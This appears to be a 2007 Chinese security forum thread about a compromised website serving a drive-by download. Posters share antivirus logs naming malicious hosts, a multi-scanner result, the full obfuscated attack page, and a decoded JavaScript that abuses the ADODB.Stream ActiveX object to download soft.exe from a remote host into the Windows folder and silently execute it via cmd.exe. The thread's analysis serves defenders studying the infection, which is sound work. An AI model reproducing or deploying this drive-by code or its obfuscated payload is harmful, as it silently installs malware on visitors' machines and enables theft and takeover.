东方卫士网页被挂马

The EQs

Time        Module        Object        Name        Threat        Action        User        Information
2007-6-14 11:15:06        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\N7HJWTDR\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        quarantined - deleted - error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred on a new file created by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe. The file was moved to quarantine. You may close this window.
2007-6-14 11:15:06        IMON        file        http://mm.987999.com/mm/YuiAnLQvZx.jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:15:03        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\N7HJWTDR\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred at an attempt to access the file by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe.
2007-6-14 11:15:00        IMON        file        http://www.69642.cn/wm/69642.bmp        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:14:59        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\M1D3KQEB\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        quarantined - deleted - error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred on a new file created by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe. The file was moved to quarantine. You may close this window.
2007-6-14 11:14:58        IMON        file        http://www.69642.cn/wm/69642.bmp        a variant of Win32/TrojanDownloader.Ani.Gen trojan                ATCC-ECB11DDF64\EQ2       
2007-6-14 11:14:57        AMON        file        C:\Documents and Settings\EQ2\Local Settings\Temporary Internet Files\Content.IE5\M1D3KQEB\YuiAnLQvZx[1].jpg        a variant of Win32/TrojanDownloader.Ani.Gen trojan        error while cleaning - operation unavailable for this type of object        ATCC-ECB11DDF64\EQ2        Event occurred at an attempt to access the file by the application: D:\Program Files\GreenBrowser\GreenBrowser.exe.

小邪邪

咖啡杀一筐

mofunzone

原帖由 solcroft 于 2007-6-13 15:27 发表
脚本没加密，网马地址看得很清楚
http://mm.987999.com/soft.exe

看来你没找到正主
或者说瑞星把解密后的东西杀到了
有兴趣的自己解吧
写作业去了，biology很烦人。。
File:           b.htm
Status:        
INFECTED/MALWARE
MD5         e9e20f117d2aa34a1a39c35944e845ca
Packers detected:        
-
Scanner results
Scan taken on 14 Jun 2007 03:18:54 (GMT)
A-Squared        
Found nothing
AntiVir        
Found nothing
ArcaVir        
Found nothing
Avast        
Found nothing
AVG Antivirus        
Found nothing
BitDefender        
Found nothing
ClamAV        
Found nothing
Dr.Web        
Found nothing
F-Prot Antivirus        
Found nothing
F-Secure Anti-Virus        
Found nothing
Fortinet        
Found nothing
Kaspersky Anti-Virus        
Found nothing
NOD32        
Found nothing
Norman Virus Control        
Found nothing
Panda Antivirus        
Found nothing
Rising Antivirus        
Found nothing
VirusBuster        
Found JS.Dropperapp.A
VBA32        
Found nothing

1. 
   
2. <html><head><script>eval(unescape('%66%75%6E%63%74%69%6F%6E%20%6D%28%73%29%7B%76%61%72%20%63%2C%6E%2C%7A%2C%69%3B%7A%3D%27%27%3B%69%3D%30%3B%77%68%69%6C%65%28%69%3C%73%2E%6C%65%6E%67%74%68%29%7B%63%3D%73%2E%63%68%61%72%41%74%28%69%29%3B%20%69%66%28%27%75%27%3D%3D%63%29%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%32%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%33%29%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%34%29%3B%6E%3D%35%3B%7D%20%65%6C%73%65%7B%63%3D%27%25%27%2B%63%3B%63%2B%3D%73%2E%63%68%61%72%41%74%28%69%2B%31%29%3B%6E%3D%32%3B%7D%7A%2B%3D%63%3B%69%3D%69%2B%6E%3B%7D%72%65%74%75%72%6E%20%7A%3B%7D%20%66%75%6E%63%74%69%6F%6E%20%65%28%73%29%7B%72%65%74%75%72%6E%20%75%6E%65%73%63%61%70%65%28%6D%28%73%29%29%3B%7D'));eval(e('66756E6374696F6E2064286F73297B766172206B65793D227765626965223B7661722064733B64733D27273B766172206B702C73702C732C6B632C73633B206B703D303B73703D303B7768696C652873703C6F732E6C656E677468297B73633D206F732E63686172436F64654174287370293B6B633D6B65792E63686172436F64654174286B70293B20696628282873635E6B63293D3D3339297C7C282873635E6B63293D3D3932297C7C282873635E6B63293C3332297C7C282873635E6B63293E3132362929207B733D537472696E672E66726F6D43686172436F6465287363293B7D656C73657B733D537472696E672E66726F6D43686172436F6465282873635E6B6329293B7D2064732B3D733B6B702B2B3B73702B2B3B6966286B703E3D6B65792E6C656E677468296B703D303B7D72657475726E2064733B7D2066756E6374696F6E2064692873297B733D642873293B646F63756D656E742E777269746528756E657363617065286D28732929293B7D'));/*EncryptHTML*/</script><script Language='JavaScript'>di('D&UZSDRP_9@UU]WGS!_TA T^RBSS_RAPQ-S6SS^SATUZSDRP_9@UU]V2U&Y$ASU5S2SQ^QA9T/S2WR_RA PQS2W[^B@STXREWR_ @PT-SESW^WEUQ-WGQ&_T@QTQW2RP_TA T]S1S&[]E9P(S2V ^WAPU]RBRP_ EUV-SFRV_]E U[S1RW_ AQPQS2RW_!AWT5REW[[BERP,SBRZ_PERQ+R3RV^W@9R-U6R _TATTXV3WP_#AWT(WEV Y!G$T[SESPZ!EWT5SDRV[WDBR-U6SQ_VAVQ-WEQS_QA#T]SEWE[WDBR-U6SV_QAQQ-WEPQ^Q@WT5SFS&[WDBR-U6SW_PAPQ-WEQ&_9AVU[S1RQ_#ASU]W2WPZBG!R(SAST_SD!P[POQ&]&C]W]PCPR[WDBR-U6S!_$D!P^SORV^Q@UQ(W1W$^RAPT[W2ST^WAPT5R@SW_WA]U]S3WE_VA#T-W1RQ_#ASU]W2SW^]APP^V5WRY!G$U_SFRP[UAQT_V3SV_#AVU5S3SW_ @QP,SDRP_PATU]SBQW_&APT-SBSE^QE]TXSFSS[BAWT[SEW[ZBEUR-U6SV_SE UZSBRV]T@QU]RES[_W@PU]SBWZ[WAVT*SFRQ^VA9T]WEW![WAVT*RDS[_QD$V[QCV[ZSCVQ5VBVT[!DSQ5QFVQ[!DTQXQCVR[!D9QQVDQS[!DUQYQDVRZQCSVZVEV[]PDVQ_WEW[ZBEUR-U6RT_T@WPYROV&_QASP,QDRP_PATU]SBQ$_WA$T5SDRV[]APT5SBW _SAST_W4WP[WE9Q+WGU&Y$@STXREWR5VD!T]SAWE]V@WT5SFRV_PC#T[S6SW_V@QPQSDSQ_VEBT]SCSV[&EWP[WNV [UG!R(PDWE^Q@9UYSBV&ZTDBPYU3U#^]E T/RGSW_ E]P[Q@QW5QEWP*WGS!_$E&QYWNV [UG!R(ROWE^VAPT,SCWZ[9DBPYS3R#ZTD!T^S2WZZTDUQYVGW[ZBEUR-U6RT_T@WPYQAV&_QASP,QDRP_PATU]SBQ$_WA$T5SDRV[]EWWZSDRP_9@UU]SNSE_RE V_SNS!_PBVUPRDRV_PA!V/SES#_PAVU]WEW![WEWPPV5U&Y$@STXREWR^QA!UYV3QT[ CRT5RCPQ^UAPTZSNSS_&CST/S4SV_P@WPQVGW[ZB@STXREWR^QDWQ+U3U#^QDWQ-QAWE]W@PTPS4SV5UATU]SOWZ^QA!UYW4WP^WA9UZSNSE_REWP+S3R#ZTE9Q+U3U#_!@$QXV3WR]SE V[RBS[_&AQWYSFRV_]E]U]S3RR[&A!U(VFW[ZBBVP,Q1RR_PA PQWNV Y!G$WZW2PU^WA9U]SBWZ^]E U[SBRQ^UA#T,RDSW]WA#T]RNW[ZBG!R(PDWE5VATU_SBPV_#CSTPS4SW[]A!U(VFW!ZWE9Q+U3U#5VE VZS4S$^VAPPQWNV Y!G$V_W2Q&_#@ST5QAS[_&APPQS3R#ZTE&U]VEW[ZBG!R(RASS^WEUWXV3SV_SE VZRESW_T@QT5Q1SP_$APTZRCWZ[WBVTQSBS!_&E VXRGRR_&A9TZSFRV_9A#T,WEW![WEWPPV5U&Y$APUQRGVSZ!CSP,QERW_9A&T]PGSS^QA]PQRCS&^UEBP^P4P!^V@9UZRCSW_!DVQ[W@W![RAVT-SCWE_P@]T5W@W[ZBG!R(PFWE5VA]T5S4S!]P@]T5SDRW^QAPPQSBRZ^UDTP*W@WR[#AVPYW@W ^QDWP*WEWP[&EWT/RGSW_ EWP*VGW[ZB@!TZSFRV_VA]PQSNW[^BA9Q-VFV ^!G!R(V4W$^VAVU[SNRR^QD PYWG');</script></head></html><Script language="Javascript" src="b.js"></Script>
   

复制代码

dikex

主要解密部分解密：

1. <SCRIPT language=javascript>
   
2. function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}try
   
3. {aaa="obj";
   
4. bbb="ect";
   
5. ccc="Adodb.";
   
6. ddd="Stream";
   
7. eee="Microsoft.";
   
8. fff="XMLHTTP";
   
9. lj='http://web.freewebhtm.com/soft.exe';
   
10. var df=document.createElement(aaa+bbb);
    
11. df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    
12. var x=df.CreateObject(eee+fff,"");
    
13. var S=df.CreateObject(ccc+ddd,"");
    
14. S.type=1;
    
15. x.open("GET", lj,0);
    
16. x.send(); mz1=gn(1000);
    
17. var F=df.CreateObject("Scripting.FileSystemObject","");
    
18. var tmp=F.GetSpecialFolder(0);var t2;
    
19. t2=F.BuildPath(tmp,"rising"+mz1);
    
20. mz1= F.BuildPath(tmp,mz1);S.Open();
    
21. S.Write(x.responseBody);
    
22. S.SaveToFile(mz1,2);
    
23. S.Close();
    
24. F.MoveFile(mz1,t2);
    
25. var Q=df.CreateObject("Shell.Application","");
    
26. exp1=F.BuildPath(tmp+'\\system32','cmd.exe');
    
27. Q.ShellExecute(exp1,' /c '+t2,"","open",0);}catch(i){i=1;}
    
28. </SCRIPT>

复制代码

sums2001

http://www.i110.com/index.html